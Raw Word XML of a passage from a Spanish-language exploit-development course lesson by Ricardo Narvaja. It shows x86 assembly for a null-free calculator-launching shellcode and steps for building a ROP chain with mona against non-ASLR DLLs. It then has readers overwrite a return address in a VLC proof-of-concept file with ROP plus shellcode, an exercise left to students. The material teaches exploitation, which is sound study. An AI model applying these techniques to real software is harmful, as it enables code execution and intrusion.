      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61A31178" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ECX,EBX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="47E217F0" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>MOV CL,0FF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BD28E1" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED61FA6" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>LOOPD SHORT CANARY_c.00A713D8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3788E9F7" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH 636C6163</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A846739" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EDX,ESP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6478BBEA" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EDX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CDE16B" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EDX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D7E72" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF89435" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515AA951" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PUSH EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1E7034" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C34453" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20D7EE" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D088CA5" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EDX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C085EDA" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PUSH EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382B7A8E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>CALL EDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77097D9D" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4224DCAE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Eso ejecuta la calculadora en cualquier lugar que lo peguemos, tiene de bueno que no tiene ceros, aunque puede haber programas que rechacen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>algún</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> otro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>carácter</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, eso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>dependerá</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B32E7BD" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF1000D" w14:textId="37A18BBC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Ya sabemos hacer ROP y ya tenemos un shellcode universal, la idea es que practiquen con el programa VLC que dejamos hecho el POC, me </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>haría</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> muy feliz que alguno me mande el archivo completo y un tute explicando lo que hicieron, lo agregaría aquí</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> como una parte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> al primero que envíe al exploit con un tuto bien explicado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9BA3A6" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE20899" w14:textId="37B3F17B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El rop lo pueden hacer a mano o con mona no hay problema deben buscar a ver si hay </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dlls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sin ASLR y si hay más de una sin</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASLR, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el mona</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiene para pasar más de una dll como argume</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nto, para armar el ROP combinando ambas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D70A1A2" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F5ABB4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En cuanto al script de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> les daré un esquema una vez que arman el ROP, abren el archivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>POC.ty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8E8C9" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59976366" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1A059548" wp14:editId="2777AF89">
            <wp:extent cx="3116275" cy="2435962"/>
            <wp:effectExtent l="0" t="0" r="8255" b="254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333" cy="244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2DFA" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D699535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>Y buscan el 41424344 que quedaba pisando el RETURN ADDRESS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768DCD5F" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390C9B6A" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B30C8C" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2AE8CFA3" wp14:editId="40725E55">
            <wp:extent cx="4468495" cy="362204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564" cy="36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24EE" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3596C901" w14:textId="5499790F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Y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ahí</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>según</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el largo del ROP +SHELLCODE pongamos como ejemplo que el ROP y SHELLCODE miden 150 bytes, reemplazo una zona un poco mayor a partir del 41424344 incluido él mismo pongámosle</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> 160 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A9FFA8" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C1B722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Voy marcando hacia abajo hasta que obtengo la zona marcada del largo </w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que necesito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B6ACA" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="375CC69D" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6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7E99AC9B" wp14:editId="687FAC52">
            <wp:extent cx="3554730" cy="2990215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784" cy="29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38FE" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A635ED0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>Relleno la zona seleccionada con 90s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213912D4" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25940A83" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0502A2EE" wp14:editId="51312F78">
            <wp:extent cx="4084955" cy="293116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068" cy="29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FF9C" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0651CA1C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>Chequeo bien el largo de la zona de 90s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que sea mayor al largo de ROP más SHELLCODE y que sea un valor conocido, lo anoto en mi caso 160.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC33DC3" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F250E0B" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6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6F6F279" wp14:editId="65C0250E">
            <wp:extent cx="4089197" cy="2779776"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1905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692" cy="27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C2A4" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6FF727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>Ahí hay un esquema del script no está probado ni nada</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, no funcionara, no tiene definido el ROP ni el SHELLCODE, pueden usar el SHELLCODE UNIVERSAL que acabamos de ver si no hay problemas con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ningún</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>carácter</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sino </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>deberán</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> buscar otro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68696A62" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F231BED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La idea es que el script abre el archivo con los 90, los reemplaza como una fruta </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>del mismo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> largo que contiene al inicio el ROP y el SHELLCODE y relleno, y luego lo guarda para probarlo, si funciona será el exploit, sino habrá que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tracear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a ver que falla, </w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">jeje. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F32345" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9CF58B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La verdad me </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>pondría</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> muy contento y vería que tanto escribir no es inútil, si alguien hace un tute y manda el exploit funcional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3284A97E" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26671201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 xml:space="preserve">El primero que envíe lo pondré como parte del curso, si hay más de uno los </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>subiré</w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> dentro de la carpeta SOLUCIONES del </w:t>
      </w:r>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>curso que creare para esto en las webs (si es necesario jeje)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2A71ED" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06616878" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D25A6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Hasta la parte 41 a ver si practican y hallan una solución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F16F20" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRPr="000D25A6" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06410CEC" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="000D25A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ricardo Narvaja </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08997B9A" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03276976" w14:textId="77777777" w:rsidR="00D505AB" w:rsidRDefault="00D505AB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D50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5AB"/>
    <w:rsid w:val="000D25A6"/>
    <w:rsid w:val="00D505AB"/>
    <w:rsid w:val="2F49765D"/>
    <w:rsid w:val="58782B6E"/>
    <w:rsid w:val="5AD47320"/>
    <w:rsid w:val="5E0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78F0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D25A6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="000D25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5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5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5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2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25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D25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0D25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25A6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5A6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5A6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25A6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D25A6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D25A6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A6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A6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A6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5A6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0D25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0D25A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D25A6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="000D25A6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="F79646" w:themeColor="accent6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="000D25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25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D25A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A6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D25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2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25A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D25A6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0D25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D25A6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0D25A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D25A6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0D25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acketstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcod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ricnar</dc:creator>
  <cp:lastModifiedBy>ricardo narvaja</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-23T10:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-21T15:40:00Z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